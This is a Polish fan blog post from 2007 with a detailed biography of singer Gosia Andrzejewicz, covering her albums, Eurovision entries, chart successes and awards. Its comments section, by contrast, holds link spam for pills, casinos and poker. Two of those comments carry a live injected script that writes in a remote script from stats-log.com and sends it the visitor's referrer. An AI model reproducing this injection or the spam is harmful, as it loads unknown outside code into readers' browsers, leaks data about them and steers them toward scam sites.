Bloog Wirtualna Polska
Jest 1 273 518 bloogów | losowy blog | inne blogi | zaloguj się | załóż bloga
Kanał ATOM Kanał RSS

GOSIA ANDRZEJEWICZ

niedziela, 10 czerwca 2007 15:26
Skocz do komentarzy
Biografia Gosi Andrzejewicz
Gosia Andrzejewicz –osobowość muzyczna obdarzona miłym, ciepłym głosem, przyszła na świat 14 stycznia 1984 roku. Muzyka towarzyszyła jej od dziecka. Już w szkole została „dyżurną wokalistką” obsługującą akademie i różne uroczystości. Jeździła również po całej Polsce występując w przeglądach młodej twórczości. Wygrała ponad 30 konkursów, w tym wiele ogólnopolskich. Dorastała w Bytomiu, gdzie dwukrotnie otrzymała nagrodę prezydenta miasta za szczególne osiągnięcia artystyczne.
Największym przeżyciem muzycznym tego okresu był dla Niej występ w Sali Kongresowej w Warszawie przed ponad 3-tysięczną publicznością. To właśnie na tym koncercie poczuła jak bardzo uwielbia przekazywać ludziom emocje poprzez swoje piosenki.
W 2 klasie liceum została wokalistką zespołu jazzowo-popowego założonego przez studentów Wydziału Jazzowego w Katowicach, którzy skomponowali dla Niej kilkanaście utworów. Po licznych próbach zespół wystąpił w kilku klubach, w TV Katowice, dotarł też do eliminacji Debiutów Opolskich. Jednak spora rozbieżność wizji muzycznych oraz brak wzajemnego zrozumienia przesądziły o odejściu Gosi z zespołu. Po wielu nieudanych próbach z różnymi lokalnymi kompozytorami, Gosia odkryła w sobie talent twórczy i sama zaczęła układać melodie najlepiej oddające jej osobowość. W tym czasie, za sprawą ogłoszenia, nawiązała również znajomość z Adamem Kamińskim oraz jego bratem Arturem "St0ne" Kamińskim (producentem R'n'B, Hip-Hop, współpracującym m. in. z Syndesmo i Peją) rozpoczynając tym samym pracę nad materiałem na swoją debiutancką płytę. „St0ne” zajął się produkcją i aranżacją utworów w stylu R’n’B, natomiast Adam utworami w stylu pop. Teksty do piosenek pisała Gosia wraz z Alicja Maciejowską.
W 3 klasie liceum rozpoczęła się dla Gosi przygoda z językiem włoskim, w którym zakochała się bezgranicznie. Celem pogłębienia znajomości języka wyjechała podczas wakacji na kurs do Florencji, tam też Ją oraz Jej wielki talent dostrzegł włoski kompozytor Goffredo Orlandi, laureat Sanremo, znany ze współpracy z takimi gwiazdami jak Laura Pausini czy Marco Masini. Od razu zaproponował Jej współpracę, stając się tym samym trzecim kompozytorem i producentem debiutanckiej płyty Gosi Andrzejewicz.
Po ukończeniu IV LO im. B. Chrobrego w Bytomiu Gosia została studentką Wyższej Szkoły Biznesu i Informatyki im. J.Tyszkiewicza i zamieszkała w Bielsku –Białej. W marcu 2004 zakończyła pracę nad debiutanckim albumem zatytułowanym ”Gosia Andrzejewicz”. Gosia jest autorką większości tekstów i kompozytorką 5 utworów. Cechą charakterystyczną płyty jest ciekawa, współczesna produkcja oraz różnorodność stylów, bowiem można na niej znaleźć takie gatunki jak pop, r'n'b, czy też brzmienia klubowe. Czynnikiem łączącym płytę w spójną całość jest subtelny i zmysłowy głos artystki. Piosenki pt: "Wielbicielka", "Nieśmiały chłopak" i "Słowa" dostały się na czołówki list przebojów kilkunastu rozgłośni w całej Polsce oraz zostały umieszczone na składankach dla Dj'ów. Utwór "Wielbicielka" trafił na składankę "Polskie lato 2004" w Chicago obok takich wykonawców jak Sistars, Krzysztof Krawczyk, Trzeci Wymiar, Ania Dąbrowska. Gosia nagrała również drugą wersję "Wielbicielki" z Wilkinsem - wokalistą ze Stanów Zjednoczonych w wersji hiszpańsko-polskiej z rapem amerykańskiego rapera Donalda-d. Piosenka ta ukaże się na płycie Wilkinsa pod koniec września 2005 roku i będzie przeznaczona na rynek amerykański. Płyta Gosi spodobała się słuchaczom, o czym świadczyły wysokie miejsca na listach przebojów, reakcje na koncertach oraz bardzo duże zainteresowanie utworami umieszczonymi na ogólnopolskich portalach internetowych. Na stronie Wirtualnej Polski, gdzie umieszczone są mp3 artystów polskiej sceny muzycznej, piosenka "Słowa" osiągnęła 1 miejsce we wszystkich kategoriach muzycznych, a ilość przesłuchań doszła do 5000 dziennie, a w ciągu miesiąca przekroczyła 125 000. W plebiscycie na Gwiazdę Roku 2004 zorganizowanym przez internetowy serwis muzyczny Net Fan Gosia zdobyła 1 miejsce (683 głosy), natomiast trzecie miejsce na podium przypadło grupie Wilki (179 głosy).
Gosia Andrzejewicz była gościem Teleexpressu, gdzie udzieliła wywiadu oraz zaprezentowała fragmenty teledysku do piosenki "Słowa".

W kwietniu 2005 roku Gosia została zaproszona na Konkurs Eurowizji przez zespół Ivan i Delfin. Wspomagała wokalnie ich piosenkę pt: „Czarna dziewczyno” oraz zagrała w tym utworze partie solowe na akordeonie. Eurowizyjna przygoda dała Gosi bardzo wiele. W Kijowie poznała wielu znanych, muzycznych osobistości, którzy na codzień pracują z Madonną, Dido, Jamelią czy Celine Dion. Od tamtej pory wzrosła Jej popularność i posypały się propozycje współpracy z różnymi muzykami. Owocem tych poczynań jest m.in. projekt o nazwie "Bitter Sweet-First Sight", nagrany w stylu progressive dance dla wytwórni Goblin Records. Premiera płyty winylowej tego utworu odbyła się na Dj Meeting w Oberhausen w Niemczech. Singiel pojawił się na składankach, w Norwegii, Finlandii, Danii, Szwecji Japonii, na płytach winylowych w Singapurze, a także na płytach CD w największej wytwórni fonograficznej w Indonezji, gdzie oprócz projektu Bitter Sweet, firma wydaje takich artystów jak Groove Coverage i Mel C.

Do współpracy Gosię zaprosił również Krist Van D –producent, grający z takimi gwiazdami, jak: Dance Nation, Shaun Baker, Steve Murano, DJ Novus (Groove Coverage). Artystka nagrała z nim wspólnie utwór "Waiting for love", który już wkrótce wyjdzie na maxi singlu w 5 różnych wersjach. Teledysk do tego utworu będzie promować składankę Krist Van D & Friends, na której znajdą się zarówno artyści polskiej sceny muzycznej jak i zagranicznej.

W czerwcu 2005 roku Gosia razem ze składem 2-12 nagrała utwór wyprodukowany przez St0ne`a pt: „Daj coś od siebie”. Utwór był dostępny na płycie dołączonej do magazynu "Magazyn Hip Hop" nr 28. W listopadzie tego samego roku, piosenki “Miłość” oraz “What cha really wanna?” trafiły na dołączona do "Magazyn Hip Hop" nr 32, składankę zatytułowaną “2-12 i przyjaciele”.

Rok 2005 był dla Artystki bardzo pracowity. Na przełomie czerwca i lipca, odbyła serię bardzo ciepło przyjętych koncertów, a już w sierpniu nastąpiły przygotowania do nagrywania Jej nowych piosenek takich jak: „Pozwól żyć”, ”The best thing”.

W październiku 2005 roku Gosia wzięła udział w konkursie “Rap Eskadra 3”. Stylistyka zgłaszanych piosenek obejmowała m.inn. hip-hop, r'n'b, soul. Konkurs ten okazał się dla Gosi bardzo szczęśliwy ponieważ została jego zwyciężczynią. Wyprodukowaną przez Artura “St0ne” Kamińskiego piosenką pt. “Miłość” pokonała ponad 500 artystów z całej Polski! Nagrodą w tym konkursie była propozycja kontraktu płytowego z wytwórnią UMC, promocja piosenki “Miłość” w Radiu Eska oraz wydanie jej na składance „Rap Eskadra 3”. W miesiąc po ogłoszeniu wyników konkursu piosenka “Miłość” zaistniała na falach Eski, oraz innych stacji radiowych w całej Polsce.

Kontynuując pracę nad nowymi piosenkami, w grudniu 2005 roku Gosia postanowiła spróbować swoich sił startując w Polskich eliminacjach do konkursu Eurowizji. Jednak specjalnie stworzona na tę okazję, wyprodukowana przez St0ne'a piosenka pt. “Niebezpieczna gra” nie zakwalifikowała się do finałowej 15-tki. Gosia postanowiła spróbować raz jeszcze, wysyłając tym razem angielskojęzyczną wersję tej piosenki na Białoruskie preselekcje. Piosenka “Dangerous game” bo taki był jej angielski tytuł zakwalifikowała się do finałowej piętnastki. 10 lutego 2006 roku w Mińsku Gosia wykonała ją podczas koncertu telewizyjnego.

10 kwietnia 2006 miała miejsce premiera reedycji debiutanckiego dwu płytowego albumu Gosi zatytułowanego “Gosia Andrzejewicz Plus”. Na albumie tym poza piosenkami z pierwszej płyty znalazły się nowe utwory, wersje instrumentalne, oraz wersje accapella dla Dj'ów. Płytę promowała piosenka “Pozwól żyć”, która została bardzo dobrze przyjęta przez fanów. W krótkim czasie piosenka ta zdobyła status "Teledysku Tygodnia” w portalu ONET, osiągając później pierwszą pozycję na liście ONET MUZYKI. Znalazła się również na 1 miejscu listy TOP 10 portalu INTERIA, jak i trafiła na szczyt POP LISTY w RMF FM. W październiku 2006 płyta “Gosia Andrzejewicz Plus” zdobyła status złotej płyty. Ponadto w tym samym miesiącu w Warszawie, w Sali Kongresowej podczas uroczystości wręczenia Złotych Dziobów Radia Wawa 2006, Gosia zdobyła Złoty Dziób w kategorii “Odkrycie Roku”.

17 listopada 2006 światło dzienne ujrzała kolejna płyta Gosi, zatytułowana “Lustro”. Utworem promującym to wydawnictwo była napisana przez Gosię Andrzejewicz i Artura “St0ne” Kamińskiego piosenka pt. “Trochę ciepła”. Spotkała się ona z bardzo dobrym przyjęciem fanów, w krótkim czasie od dnia premiery zdobyła pierwsze miejsca list: TOP 10 portalu INTERIA oraz listy przebojów OnetMuzyki portalu ONET. Osiągnęła również szczyt Pop Listy RMF FM jak i listy MTV MAXXX HITS. Ponadto w wielkim, podsumowującym muzyczny rok, plebiscycie radia RMF FM i portalu INTERIA.PL na "Przebój Roku 2006", piosenka “Trochę ciepła” uplasowała się w pierwszej dziesiątce, zajmując siódmą pozycję. W TOP 20 tego zestawienia znalazły się również dwie inne piosenki Gosi: “Słowa” (13) i “Pozwól żyć”(17). Czyniąc tym samym z Gosi JEDYNEGO polskiego artystę, któremu udało się zamieści aż trze piosenki w tym zestawieniu.

W kwietniu 2007 Gosia otrzymała trzy nominacje do Eska Music Awards 2007 w kategoriach: Artystka Roku, Hit Roku Pop, Radiowy Debiut Roku. Miesiąc później podczas transmitowanej na żywo gali wręczenia nagród, statuetka za Radiowy Debiut Roku powędrowała w ręce Gosi.

Obecnie Gosia koncertuje i pracuje nad nowymi piosenkami.

Popularność artystki zwiększa się coraz bardziej, o czym świadczy powstanie fanclubów oraz ponad 1000 blogów, na których fani Gosi zamieścili teksty piosenek oraz mp3 utworów z jej płyty.
Podziel się
oceń
0
0

Więcej na ten temat


Komentarze do wpisu

Skocz do dodawania komentarzy
 • dodano: 13 listopada 2015 8:28

  Zapraszam :)

  autor Anita

  blog: http://ideas-kids.ak12.co.uk/used-baby-furniture-kansas+2.html

 • dodano: 05 stycznia 2008 23:52

  I8B9zj <a href="http://ygydfgkpnoyb.com/">ygydfgkpnoyb< ;/a>, [url=http://nqlczsifpogi.com/]nqlczsifpogi[/url], [link=http://ssmwdatyohgu.com/]ssmwdatyohgu[/link], http://vlmlaponvovm.com/

  autor WeSBYsBhcq

  blog: yYKcPXJodffObFfX

 • dodano: 03 września 2007 2:01

  6xp3bld-eln6185-tw6qd8de-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escap e(r)+'"><' + '/script>')</script> http://www.benchmarkhq.ru/cgi-bin/ikonboard/topic.cgi?forum= 2&topic=1443#1
  <a href="http://www.benchmarkhq.ru/cgi-bin/ikonboard/topic .cgi?forum=2&topic=1443#2">cheap health insurance</a>
  [url=http://www.medsinfo.org/bontril_sr.html#3]bontril[/url ]
  [url]http://www.benchmarkhq.ru/cgi-bin/ikonboard/topic.cgi? forum=2&topic=1443#4[/url]
  [http://www.opeko.fi/keskustelut/topic.asp?TOPIC_ID=1860#5 play online poker]
  "bontril":http://www.medsinfo.org/bontril_sr.html #6
  [LINK http://www.opeko.fi/keskustelut/topic.asp?TOPIC_ID=1860#7]pl ay online poker[/LINK]

  autor bontril

  blog: www.medsinfo.org/bontril_sr.html#0

 • dodano: 02 sierpnia 2007 4:35

  *6SPL8O <a href="http://www.cmiss.org/portal_memberdata/portraits/ johngalt">buy viagra on line </a> buy viagra on line <a href="http://peumans-pc.stanford.edu/portal_memberdata/ portraits/lanameyers">viagra now</a> viagra now <a href="3000">buy cheap viagra</a> buy cheap viagra

  autor buy viagra online

  blog: www.cmiss.org/portal_memberdata/portraits/laura11

 • dodano: 02 sierpnia 2007 4:34

  *TSZQJV 3000 viagra cialis levitra [url=http://www.cmiss.org/portal_memberdata/portraits/johnga lt] buy viagra[/url] buy viagra <a href="http://peumans-pc.stanford.edu/portal_memberdata/ portraits/DavidDamato">on line</a> on line

  autor cheap online viagra

  blog: www.cmiss.org/portal_memberdata/portraits/laura11

 • dodano: 02 sierpnia 2007 4:33

  *1AG3O0 http://peumans-pc.stanford.edu/portal_memberdata/portraits/l anameyers buy viagra [url=http://www.cmiss.org/portal_memberdata/portraits/laura1 1]generic viagra[/url] generic viagra <a href="http://www.cmiss.org/portal_memberdata/portraits/ johngalt">viagra pharmacy</a> viagra pharmacy

  autor order viagara

  blog: peumans-pc.stanford.edu/portal_memberdata/portraits/DavidDamato

 • dodano: 19 czerwca 2007 5:04

  8ux44zm-m41ce8m-tw6q3bdc-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escap e(r)+'"><' + '/script>')</script> <a href="http://200.77.230.9/HyperNews/get/atomo/61.html#2 ">online casino</a>
  http://200.77.230.9/HyperNews/get/atomo/20.html#1
  [url=http://200.77.230.9/HyperNews/get/atomo/20.html#3]phen termine[/url]
  [url]http://200.77.230.9/HyperNews/get/atomo/19.html#4[/url ]
  [http://200.77.230.9/HyperNews/get/atomo/63.html#5 slots]
  "cialis":http://200.77.230.9/HyperNews/get/atomo/ 19.html#6
  [LINK http://200.77.230.9/HyperNews/get/atomo/63.html#7]slots[/LIN K]

  autor cialis

  blog: 200.77.230.9/HyperNews/get/atomo/19.html#0

Zapamiętaj Nick

Zapamiętaj Blog

Wstaw emotikona

Akceptuję regulamin i zobowiązuję się do przestrzegania jego postanowień.

sobota, 25 listopada 2017

Licznik odwiedzin:  67 064  

Kalendarz

« listopad »
pn wt śr cz pt sb nd
  0102030405
06070809101112
13141516171819
20212223242526
27282930   

Archiwum

O moim bloogu

Mój blog dopiero jest noey ale mam nadzieję że się wam spodoba :)

Głosuj na bloog


zobacz wyniki

Wyszukaj

Wpisz szukaną frazę i kliknij Szukaj:

Subskrypcja

Wpisz swój adres e-mail aby otrzymywać info o nowym wpisie:

Statystyki

Odwiedziny: 67064

Lubię to

Więcej w serwisach WP

Pytamy.pl

Pytamy.pl